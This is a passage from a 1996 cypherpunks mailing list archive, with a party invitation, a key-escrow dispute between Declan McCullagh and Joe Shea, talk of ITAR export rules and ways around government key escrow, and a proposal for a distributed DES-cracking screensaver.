early, to reserve one of the spare beds, futons, etc.

As with past parties at my place(s), folks are encouraged to find things to
do in Santa Cruz, Monterey, Carmel, etc. during the day. The Monterey Bay
Aquarium is worth a trip, especially with the new "Outer Bay" exhibit (the
biggest piece of glass in the world). A famous rose place, "Roses of
Yesterday," is a few miles further down Brown's Valley Road from my place.

Directions: Get to Santa Cruz on Highway 17. From Santa Cruz, travel toward
Monterey on Highway 1 for about 8 miles. Take the Freedom Boulevard exit,
just past the Rio Del Mar exit. Travel 5 miles on Freedom Blvd. Turn left
on Corralitos Road. Travel about 2 miles or so, to a 4-way intersection.
The renowned Corralitos Market and Sausage Company will be on your left.
Turn right on Brown's Valley Road, and follow it as it turns to the left at
another intersection (with Amesti Road, which is closed). Travel about a
mile and turn right at Allan Lane. (It will be at about the "360" mailbox
marker on Brown's Valley Road.)

Drive to the very top of the hill. My driveway is on the left, and should
be clearly marked as "427." My house is the second one in along the
driveway, a Mediterranean design. There's parking for about 10 cars in my
driveway. Beyond that, you're on your own to park further away. (Please
don't block the driveways of others.)

(A warning: It gets dark early this time of the year. It's better to follow
the directions to my house when it's light, as there are no streetlights
out here, and few other lights. I urge folks to arrive around 5.)

>From Monterey or Carmel, drive toward Santa Cruz, getting off at the Green
Valley Road exit. Drive east. Turn left on Freedom Boulevard. Drive several
miles and turn right on Corralitos Road. Follow rest of directions from
above description.

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 17:15:08 +0800
To: Joe Shea <joeshea@netcom.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.3.89.9610020942.A12604-0100000@netcom17>
Message-ID: <Pine.GSO.3.95.961002100914.29327D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


BTW, Joe, I'm still waiting for your response to my comments on why
your endorsement of key escrow (GAK) is braindead. Or do you still
think that the Feds should have the right to spy on my conversations,
just like you thought that "porn isn't speech?"

-Declan


On Wed, 2 Oct 1996, Joe Shea wrote:

> Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
> From: Joe Shea <joeshea@netcom.com>
> To: Declan McCullagh <declan@well.com>
> Cc: cypherpunks@toad.com
> Subject: Re: White House crypto proposal -- too little, too late
> 
> 
> 
> 	Declan, how does your list work?  Do you only publish comments 
> that agree with you?  I didn't see my first two, and this one only came 
> with your response.  Is this your version of freedom of the press, or what?
> 
> Joe Shea
> Editor-in-Chief
> The American Reporter
> joeshea@netcom.com
> http://www.newshare.com:9999
> 
> 
> On Wed, 2 Oct 1996, Declan McCullagh wrote:
> 
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> > From: Declan McCullagh <declan@well.com>
> > To: fight-censorship@vorlon.mit.edu
> > Cc: joeshea@netcom.com
> > Subject: Re: White House crypto proposal -- too little, too late
> > 
> > [Joe, this may be yet another area where we disagree. It represents a
> > power grab by law enforcement; the infrastructure is prone to failure
> > and can be compromised; it's more government meddling and coercion and
> > more restrictions on free speech; the Fed bureaucrats controlling this
> > are vulnerable to special-interest lobbying; the Constitution gives
> > the Federal government no right to impose such restrictions; the FBI
> > has demonstrated that we can't trust the Feds with our most personal
> > information; it violates an absolute right to privacy; and it's
> > technically impractical for a good number of applications. --Declan]
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> > From: Joe Shea <joeshea@netcom.com>
> > To: Declan McCullagh <declan@well.com>
> > Cc: fight-censorship
> > Subject: Re: FC: White House crypto proposal -- too little, too late
> > 
> > 
> > 	Declan's most recent piece makes much more sense than the earlier
> > one.  He is quite correct in emphasizing the future vulnerability of the
> > encryption logarithms rather than centering on whether or not terrorists
> > might use them.  By making them impossible to crack without the key, and
> > permitting the key to be available to appropriate law enforcement
> > authorities when absolutely necessary, everyone's real needs are 
> > satisfied, I think.  I enjoyed this report a lot.
> > 
> > Best,
> > 
> > Joe Shea
> > Editor-in-Chief
> > The American Reporter
> > joeshea@netcom.com
> > http://www.newshare.com:9999
> > 
> > 
> > 
> > 
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 3 Oct 1996 14:13:40 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Hey, there's a camera in that palm tree!
Message-ID: <9610021718.AA16166@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


But would they be able to image identify my
butt when I moon 'em?

(And I'll have none of those "If it could image your face,
what would be the difference in imaging your butt?" jokes!)

   Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: mix @ anon.lcs.mit.edu (lcs Mixmaster Remailer) @ smtp
Date: 10/01/96 05:00:01 PM
Subject: Hey, there's a camera in that palm tree!


 LANGHORNE, Penn., Sept 30 (Reuter) - Digital Descriptor
 Systems Inc said on Monday that it had received the first
 $140,000 phase of a proposed $1.4 million contract from IBM.
     The money is to be used by the Bahamas for the installation
 of imaging identification systems. The first segment of the
 imaging program will be installed in the Bahamas by the end of
 this year.
     Digital Descriptor, in a three-year partnership with IBM to
 create a program needed on a country-wide basis by the
 government of the Bahamas, manufactures and markets imaging
 systems for municipal and private criminal enforcement markets.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 3 Oct 1996 02:30:54 +0800
To: cypherpunks@toad.com
Subject: Thoughtcrime a Reality: U.S. Toughens Child Pornography Law
Message-ID: <2.2.32.19961002142249.0070e344@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


			 
>	 WASHINGTON (Reuter) - Congress cracked down on child  
>pornographers in a new law that took effect Tuesday, making it 
>illegal to appear to depict children in sexual situations, 
>whether in films, computer images or photographs. 
>	 But the American Civil Liberties Union decried the law as  
>unconstitutional and a waste of prosecutors' resources, since it 
>expanded a law designed to protect any actual children used to 
>produce pornography. The ACLU said it also was so broad that 
>adults portraying children in films could risk prosecution. 
>	 Previously, depictions of minors produced by computers  
>without using children had been outside the scope of federal 
>law. The new law expands the definition of child pornography to 
>include any image -- photograph, video or computer-generated 
>image -- that depicts or appears to depict a minor engaged in 
>sexually explicit conduct. 
>	 Senate Judiciary Committee Chairman Orrin Hatch, a Utah  
>Republican, said it was designed to protect children from sexual 
>exploitation and pedophiles. ``This is a tough bill aimed a 
>child pornographers,'' he said. 
>	 ``While federal law has failed to keep pace with technology,  
>the purveyors of child pornography have been right on line with 
>it. Passage of this bill will help to correct that problem,'' 
>Hatch said. 
>	 But ACLU legislative counsel Daniel Katz said it had major  
>ramifications for artists, the film industry and journalism. He 
>said it included a waiver-of-privacy rule to permit newsroom 
>searches for information related to investigations of child 
>pornography. 
>	 ``It is much broader, and the ramifications are  
>extraordinary, both for artists and for people in the cinema,'' 
>Katz said.  Under this expanded definition of child pornography, 
>it would be illegal to produce or show a film that included an 
>adult actor or actress portraying a minor in a sexually explicit 
>scene, he said. 
>	 Computers can be used to alter photographs, films and videos  
>to produce sexually explicit materials virtually 
>indistinguishable from unretouched photographs. The new 
>technology has hampered prosecutors in their ability to obtain 
>convictions because it can be impossible to identify individuals 
>or to prove that the materials were produced using real 
>children. 
>	 The new law would allow prosecution of pornographers whether  
>or not the identity of the child could be determined, so long as 
>the person, even if an adult, appeared to be a minor. Currently, 
>pornography is protected under free speech laws except when a 
>minor child is involved. 
>	 Hatch said the Judiciary Committee determined that  
>computer-generated pornography posed many of the same dangers to 
>children as did pornography made from unretouched photographs in 
>that it could be used to seduce children into sexual activity or 
>to encourage a pedophile to prey on them. 
>	 The new law sets mandatory prison sentences of 15 years for  
>production of child pornography, five years for possession of 
>the materials and life in prison for repeat offenders convicted 
>of sexual abuse of a minor. 
>	 The child pornography law was included in part of a broad  
>spending bill President Clinton signed into law Monday. It had 
>passed the Senate Monday just hours before the midnight deadline 
>for the start of the new financial year. 
>	 It does not address new or expanded regulation of the  
>Internet. The Justice Department has asked the Supreme Court to 
>overturn a landmark ruling by a Philadelphia appeals court that 
>blocked as unconstitutional a new federal law barring indecency 
>on the Internet. 
>  	   	
>
>
_______________________
Regards,          You cannot depend on your eyes when your imagination 
                  is out of focus. -Mark Twain
Joseph  Reagle    http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 3 Oct 1996 11:45:21 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: How might new GAK be enforced?
In-Reply-To: <199610011603.MAA27024@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199610021725.KAA08669@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger writes:
> 
> Richard Coleman writes:
> 
> : I've always wondered why large companies just don't write some type of
> : standards document for crypto to interoperate, and then have each
> : foreign branch write (or contract out) their own version.  I don't see how
> : this violates export laws in any way.
> 
> The definition of ``software'' in the ITAR includes ``algortihms'' and
> ``logic flow'', so I suspect that the ODTC wouuld claim that the
> standards are software that cannot be ``exported'' without a licnese.


I suspect that if US company A sent its Swiss subsidiary B a sent
of standards and said "write this", your interpretation would be correct.
It's how I read ITAR also.

However, company A can publish standards.  Published standards
aren't covered under ITAR.  Non-US company C can read standards
and implement code to those standards.  I was going to back this up
by citing the appropriate part of the regs, but they're so vague
as to be almost useless.  However in real life this seems to
pass- i.e. Netscape's publishing of the SSL spec and Eric Young's
use of that spec to make an independent interoperable implementation.
 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: spatterson@juno.com (Scott L Patterson)
Date: Thu, 3 Oct 1996 02:40:20 +0800
To: cypherpunks@toad.com
Subject: send me mail
Message-ID: <19961002.072815.10350.2.spatterson@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

	In the happy mutant handbook it said your name on the crypto
section so what do you do?
	And can you send me some cool, info?

Thanks,
scott

        **Rember to see scotts page at***
WWW.GEOCITES.COM/HOLLYWOOD/HILLS/3108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Shea <joeshea@netcom.com>
Date: Thu, 3 Oct 1996 11:51:21 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.GSO.3.95.961002095501.29327C-100000@well.com>
Message-ID: <Pine.3.89.9610021034.A12604-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain



	You just managed to justify your own censorship of the list, 
Declan.  Talk about clueless!

Best,

Joe Shea
Editor-in-Chief
The American Reporter
joeshea@netcom.com
http://www.newshare.com:9999


On Wed, 2 Oct 1996, Declan McCullagh wrote:

> Joe, you submitted three pieces in roughly so many days to
> fight-censorship-announce, with is a moderated announcement-only
> mailing list that I send one or two pieces to each day. With some rare
> exceptions (like feedback I got on my anti-Net-univ-service rant) I
> don't pass along comments.
> 
> If you want to distribute them to the discussion list, address them to
> fight-censorship@vorlon.mit.edu instead. Perhaps you should join that
> list. It gets about 15 messages a day.
> 
> But don't blame me for your own cluelessness. RTFM instead of whining.
> 
> -Declan
> 
> PS: Freedom of speech includes the right not to speak. If I choose not
> to publish your stuff, my right to do so is protected under the First
> Amendment. Don't like it? Start your own
> Joe-Shea's-wacko-views-on-First-Amendment-jurisprudence mailing list
> instead. I'll even help you set it up.
> 
> 
> On Wed, 2 Oct 1996, Joe Shea wrote:
> 
> > Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
> > From: Joe Shea <joeshea@netcom.com>
> > To: Declan McCullagh <declan@well.com>
> > Cc: cypherpunks@toad.com
> > Subject: Re: White House crypto proposal -- too little, too late
> > 
> > 
> > 
> > 	Declan, how does your list work?  Do you only publish comments 
> > that agree with you?  I didn't see my first two, and this one only came 
> > with your response.  Is this your version of freedom of the press, or what?
> > 
> > Joe Shea
> > Editor-in-Chief
> > The American Reporter
> > joeshea@netcom.com
> > http://www.newshare.com:9999
> > 
> > 
> > On Wed, 2 Oct 1996, Declan McCullagh wrote:
> > 
> > > 
> > > 
> > > ---------- Forwarded message ----------
> > > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> > > From: Declan McCullagh <declan@well.com>
> > > To: fight-censorship@vorlon.mit.edu
> > > Cc: joeshea@netcom.com
> > > Subject: Re: White House crypto proposal -- too little, too late
> > > 
> > > [Joe, this may be yet another area where we disagree. It represents a
> > > power grab by law enforcement; the infrastructure is prone to failure
> > > and can be compromised; it's more government meddling and coercion and
> > > more restrictions on free speech; the Fed bureaucrats controlling this
> > > are vulnerable to special-interest lobbying; the Constitution gives
> > > the Federal government no right to impose such restrictions; the FBI
> > > has demonstrated that we can't trust the Feds with our most personal
> > > information; it violates an absolute right to privacy; and it's
> > > technically impractical for a good number of applications. --Declan]
> > > 
> > > 
> > > ---------- Forwarded message ----------
> > > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> > > From: Joe Shea <joeshea@netcom.com>
> > > To: Declan McCullagh <declan@well.com>
> > > Cc: fight-censorship
> > > Subject: Re: FC: White House crypto proposal -- too little, too late
> > > 
> > > 
> > > 	Declan's most recent piece makes much more sense than the earlier
> > > one.  He is quite correct in emphasizing the future vulnerability of the
> > > encryption logarithms rather than centering on whether or not terrorists
> > > might use them.  By making them impossible to crack without the key, and
> > > permitting the key to be available to appropriate law enforcement
> > > authorities when absolutely necessary, everyone's real needs are 
> > > satisfied, I think.  I enjoyed this report a lot.
> > > 
> > > Best,
> > > 
> > > Joe Shea
> > > Editor-in-Chief
> > > The American Reporter
> > > joeshea@netcom.com
> > > http://www.newshare.com:9999
> > > 
> > > 
> > > 
> > > 
> > > 
> > 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 3 Oct 1996 12:20:48 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: How might new GAK be enforced?
Message-ID: <9610021732.AA17359@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


One way to handle the problem mentioned below
is this:

Using your GAK-approved encryption, send a note
that contains a PGP encrypted body (or insert your
crypto of choice here.)  What this does is makes it
look like you're sending a proper GAK only note
to folks who are checking headers and such.  If 
they actually decrypt it (with the proper court order), 
they will see that you've got more encryption inside, 
and drag your butt off to court and try to make you 
give up your key etc...

If they decrypt it (and they have no proper court
order) they either go away because they can't call 
you on it, or they throw you on the bad-guy list,
or drag you off to area 51 and beat you with rubber 
hoses and some such.

Point being, You wouldn't look like you were doing anything
wrong unless they got as far as decrypting your messages.
If you're legally busted, your messages are secure.  If 
they illegally decrypt your messages, your messages
are secure, and you may have some recourse for
suing the feds.

    Ryan

---------- Previous Message ----------
To: tcmay
cc: smith, cypherpunks
From: smith @ SCTC.COM (Rick Smith) @ smtp
Date: 10/01/96 04:03:10 PM
Subject: Re: How might new GAK be enforced?

Tim May asks:

: Any other ideas on how the government plans to enforce GAK, to make GAK the
: overwhelmingly-preferred solution?

The problem seems somewhat analogous to the software copy protection
problem and maybe the enfocement will be similar: make "examples" of a
few high profile offenders who are exchanging blatantly un-GAKed
traffic with foreigners. This assumes they fine tune the law to make
such behavior illegal without having to prove you yourself exported
the stuff to them. Wonder what the Supremes will say to that.

But that's not the end of the story. If there is lots of GAK encrypted
traffic flowing about, then encrypted traffic in general is no longer
noteworthy. So as long as your traffic looks like GAK, you won't be
hassled until they try to read your traffic.

So it's possible that products will appear that use pseudo-GAK
protocols -- they look just like their GAKed cousins but the GAK
fields contain plausiable garbage instead of keys. It could even
turn out to be a vendor "quality control" thing -- oops, the GAK
was supposed to work but...

You couldn't do that with Clipper (except via Matt Blaze's brute
forcing of the LEAF checksum) because the crypto wouldn't decrypt a
packet with an invalid LEAF checksum. Since it was a sealed hardware
module, implementers had no choice but to play by those rules. There's
no such enforcable limitation on commercial software implementations.

Rick.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 13:11:10 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <Pine.GSO.3.95.961002103805.29327F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


[But how does one undo the dangerous criminals without violating the
privacy rights of everyone else? --Declan]

---------- Forwarded message ----------
Date: Wed, 2 Oct 1996 10:30:43 -0700 (PDT)
From: Joe Shea <joeshea@netcom.com>
To: Declan McCullagh <declan@well.com>
Subject: Re: White House crypto proposal -- too little, too late


	If you become a dangerous criminal, Declan, I think law
enforcement does have the right to use key escrow to undo you.  That has
nothing to do with spying.  You need to be a little more selective about
your language, and to make distinctions a little more rationally than you
do. 

Best,

Joe Shea
Editor-in-Chief
The American Reporter
joeshea@netcom.com
http://www.newshare.com:9999


On Wed, 2 Oct 1996, Declan McCullagh wrote:

> BTW, Joe, I'm still waiting for your response to my comments on why
> your endorsement of key escrow (GAK) is braindead. Or do you still
> think that the Feds should have the right to spy on my conversations,
> just like you thought that "porn isn't speech?"
> 
> -Declan
> 
> 
> On Wed, 2 Oct 1996, Joe Shea wrote:
> 
> > Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
> > From: Joe Shea <joeshea@netcom.com>
> > To: Declan McCullagh <declan@well.com>
> > Cc: cypherpunks@toad.com
> > Subject: Re: White House crypto proposal -- too little, too late
> > 
> > 
> > 
> > 	Declan, how does your list work?  Do you only publish comments 
> > that agree with you?  I didn't see my first two, and this one only came 
> > with your response.  Is this your version of freedom of the press, or what?
> > 
> > Joe Shea
> > Editor-in-Chief
> > The American Reporter
> > joeshea@netcom.com
> > http://www.newshare.com:9999
> > 
> > 
> > On Wed, 2 Oct 1996, Declan McCullagh wrote:
> > 
> > > 
> > > 
> > > ---------- Forwarded message ----------
> > > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> > > From: Declan McCullagh <declan@well.com>
> > > To: fight-censorship@vorlon.mit.edu
> > > Cc: joeshea@netcom.com
> > > Subject: Re: White House crypto proposal -- too little, too late
> > > 
> > > [Joe, this may be yet another area where we disagree. It represents a
> > > power grab by law enforcement; the infrastructure is prone to failure
> > > and can be compromised; it's more government meddling and coercion and
> > > more restrictions on free speech; the Fed bureaucrats controlling this
> > > are vulnerable to special-interest lobbying; the Constitution gives
> > > the Federal government no right to impose such restrictions; the FBI
> > > has demonstrated that we can't trust the Feds with our most personal
> > > information; it violates an absolute right to privacy; and it's
> > > technically impractical for a good number of applications. --Declan]
> > > 
> > > 
> > > ---------- Forwarded message ----------
> > > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> > > From: Joe Shea <joeshea@netcom.com>
> > > To: Declan McCullagh <declan@well.com>
> > > Cc: fight-censorship
> > > Subject: Re: FC: White House crypto proposal -- too little, too late
> > > 
> > > 
> > > 	Declan's most recent piece makes much more sense than the earlier
> > > one.  He is quite correct in emphasizing the future vulnerability of the
> > > encryption logarithms rather than centering on whether or not terrorists
> > > might use them.  By making them impossible to crack without the key, and
> > > permitting the key to be available to appropriate law enforcement
> > > authorities when absolutely necessary, everyone's real needs are 
> > > satisfied, I think.  I enjoyed this report a lot.
> > > 
> > > Best,
> > > 
> > > Joe Shea
> > > Editor-in-Chief
> > > The American Reporter
> > > joeshea@netcom.com
> > > http://www.newshare.com:9999
> > > 
> > > 
> > > 
> > > 
> > > 
> > 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 23:30:37 +0800
To: Joe Shea <joeshea@netcom.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.3.89.9610021034.A12604-0100000@netcom17>
Message-ID: <Pine.GSO.3.95.961002103027.29327E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Joe, perhaps you didn't get the point. The fight-censorship-announce
list is for announcements (hence the name), not discussions or
back-and-forth-arguments. It's like Dave Farber's IP list -- I very
rarely include responses to what I send out. Discussions take place on
the discussion list. Do get a clue.

But the broader point is a useful one to make. I'll say it again:
freedom of speech includes the right not to speak. Private controls of
private settings are not the same as state controls of public
settings, which violate the First Amendment. (Read some of Eugene
Volokh's articles about private mailing lists and "censorship.") This
is at least the libertarian view, to which I generally subscribe. I
confess I sometimes have doubts about AOL and smut-blocking software.

Put simply: should the National Coalition Against Censorship be forced
to include off-topic rants in their newsletter? Should TIME magazine
be forced to publish rubbish? Should the American Reporter be forced
to include my rants about universal service?

The truth is that the most valuable publications -- Yale Law Review,
Wall Street Journal -- are the most selective and, by your definition,
the most "censorial." Do you see now why your view is wrong?

-Declan



On Wed, 2 Oct 1996, Joe Shea wrote:

> Date: Wed, 2 Oct 1996 10:27:46 -0700 (PDT)
> From: Joe Shea <joeshea@netcom.com>
> To: Declan McCullagh <declan@well.com>
> Cc: cypherpunks@toad.com
> Subject: Re: White House crypto proposal -- too little, too late
> 
> 
> 	You just managed to justify your own censorship of the list, 
> Declan.  Talk about clueless!
> 
> Best,
> 
> Joe Shea
> Editor-in-Chief
> The American Reporter
> joeshea@netcom.com
> http://www.newshare.com:9999
> 
> 
> On Wed, 2 Oct 1996, Declan McCullagh wrote:
> 
> > Joe, you submitted three pieces in roughly so many days to
> > fight-censorship-announce, with is a moderated announcement-only
> > mailing list that I send one or two pieces to each day. With some rare
> > exceptions (like feedback I got on my anti-Net-univ-service rant) I
> > don't pass along comments.
> > 
> > If you want to distribute them to the discussion list, address them to
> > fight-censorship@vorlon.mit.edu instead. Perhaps you should join that
> > list. It gets about 15 messages a day.
> > 
> > But don't blame me for your own cluelessness. RTFM instead of whining.
> > 
> > -Declan
> > 
> > PS: Freedom of speech includes the right not to speak. If I choose not
> > to publish your stuff, my right to do so is protected under the First
> > Amendment. Don't like it? Start your own
> > Joe-Shea's-wacko-views-on-First-Amendment-jurisprudence mailing list
> > instead. I'll even help you set it up.
> > 
> > 
> > On Wed, 2 Oct 1996, Joe Shea wrote:
> > 
> > > Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
> > > From: Joe Shea <joeshea@netcom.com>
> > > To: Declan McCullagh <declan@well.com>
> > > Cc: cypherpunks@toad.com
> > > Subject: Re: White House crypto proposal -- too little, too late
> > > 
> > > 
> > > 
> > > 	Declan, how does your list work?  Do you only publish comments 
> > > that agree with you?  I didn't see my first two, and this one only came 
> > > with your response.  Is this your version of freedom of the press, or what?
> > > 
> > > Joe Shea
> > > Editor-in-Chief
> > > The American Reporter
> > > joeshea@netcom.com
> > > http://www.newshare.com:9999
> > > 
> > > 
> > > On Wed, 2 Oct 1996, Declan McCullagh wrote:
> > > 
> > > > 
> > > > 
> > > > ---------- Forwarded message ----------
> > > > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> > > > From: Declan McCullagh <declan@well.com>
> > > > To: fight-censorship@vorlon.mit.edu
> > > > Cc: joeshea@netcom.com
> > > > Subject: Re: White House crypto proposal -- too little, too late
> > > > 
> > > > [Joe, this may be yet another area where we disagree. It represents a
> > > > power grab by law enforcement; the infrastructure is prone to failure
> > > > and can be compromised; it's more government meddling and coercion and
> > > > more restrictions on free speech; the Fed bureaucrats controlling this
> > > > are vulnerable to special-interest lobbying; the Constitution gives
> > > > the Federal government no right to impose such restrictions; the FBI
> > > > has demonstrated that we can't trust the Feds with our most personal
> > > > information; it violates an absolute right to privacy; and it's
> > > > technically impractical for a good number of applications. --Declan]
> > > > 
> > > > 
> > > > ---------- Forwarded message ----------
> > > > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> > > > From: Joe Shea <joeshea@netcom.com>
> > > > To: Declan McCullagh <declan@well.com>
> > > > Cc: fight-censorship
> > > > Subject: Re: FC: White House crypto proposal -- too little, too late
> > > > 
> > > > 
> > > > 	Declan's most recent piece makes much more sense than the earlier
> > > > one.  He is quite correct in emphasizing the future vulnerability of the
> > > > encryption logarithms rather than centering on whether or not terrorists
> > > > might use them.  By making them impossible to crack without the key, and
> > > > permitting the key to be available to appropriate law enforcement
> > > > authorities when absolutely necessary, everyone's real needs are 
> > > > satisfied, I think.  I enjoyed this report a lot.
> > > > 
> > > > Best,
> > > > 
> > > > Joe Shea
> > > > Editor-in-Chief
> > > > The American Reporter
> > > > joeshea@netcom.com
> > > > http://www.newshare.com:9999
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > 
> > 
> > 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 3 Oct 1996 11:52:35 +0800
To: jcr@idiom.com (John C. Randolph)
Subject: stupid religious bullshit
In-Reply-To: <199610021547.IAA25555@idiom.com>
Message-ID: <199610021742.KAA08899@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


John C. Randolph writes:
> 
> 
> Moroni says:
> 
> >I never cease to be surprised by the interest that gentiles show
> >in working mormon communities while totally neglecting their own
> >failing areas.
> 
> I don't do a lot of nit-picking on this mailing list, but:
> 
> I am a Jew. *You* are a gentile. So are all the rest of the mormons.
> Get this point straight.

I an' I am Rastafari, praise Jah!
Jews and Moromons all part of Babylon system, bring
sufferation on righteous Rasta.   Some day Jah
bring 'cryption technology to Rasta, help
Rasta break Babylon chains and reach holy Mt Zion.
 
Until that day, could we keep stupid religious arguments off the list so
we can talk about crypto and related issues?
Thanks.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 10:15:50 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <199610021753.KAA01512@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:09 AM 10/2/96 -0700, Declan McCullagh wrote:
>Just woke up -- got up early today to head to ACLU Supreme Court
>briefing -- but it strikes me that receiving nonescrowed crypto
>through the mail might be like receiving kiddie porn.
>
>Import restrictions, of course, will come with mandatory domestic key
>escrow.
>-Declan

I don't intend to be over-optimistic, but I think there was a good reason 
that even in the Clipper I proposal, it was (at least) _called_ "voluntary." 
 However much they'd like to make it mandatory, they know that this 
wouldn't fly.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 3 Oct 1996 10:21:30 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007801ae7237ed7a65@[207.167.93.63]>
Message-ID: <v03007803ae785c7c1dfc@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
>I challenge you to find an airport today that will not hand inspect
>laptops in checked bagage and either x-ray or hand inspect or both laptops
>carried on.  I also challenge you to find an airport that does not keep
>video tape records of their security areas.  If you do make sure to call
>the FAA and report them as well.  I understand there is a reward for lax
>security reports now.
>
San Diego
Los Angeles
San Jose

The times that I have checked the bag holding my laptop, the laptop has never been hand checked.
(I don't usually check my laptop, for fear of getting back broken plastic.)


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 10:06:18 +0800
To: cypherpunks@toad.com
Subject: Re: Public Apology (this list is a joke)
In-Reply-To: <Pine.WNT.3.95.961002081942.241B-100000@test1>
Message-ID: <2qF7uD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Temple <dtemple@ashland.edu> writes:
> 	I joined this list knowing next to nothing about cryptography.  I

You're not alone. Timmy May (fart) and many other spammers on this list
still know next to nothing about cryptography, despite posting dozens of
inane rants every day.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 3 Oct 1996 11:22:20 +0800
To: frank@funcom.no (Frank Andrew Stevenson)
Subject: Re: Can we kill single DES?
In-Reply-To: <199610020527.HAA24482@odin.funcom.com>
Message-ID: <199610021554.LAA06282@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Frank Andrew Stevenson writes:
> This location is send to the keyserver, which sends back highly
> compressed information about where other people are running their
> "screensavers", the screensaver itself can simply display a rotating
> globe, where the different densities of global usage is given in
> colour shades, showing an inverse sunclock of sorts. I think such a
> concept might give the DES-cracking screensaver a critical mass.

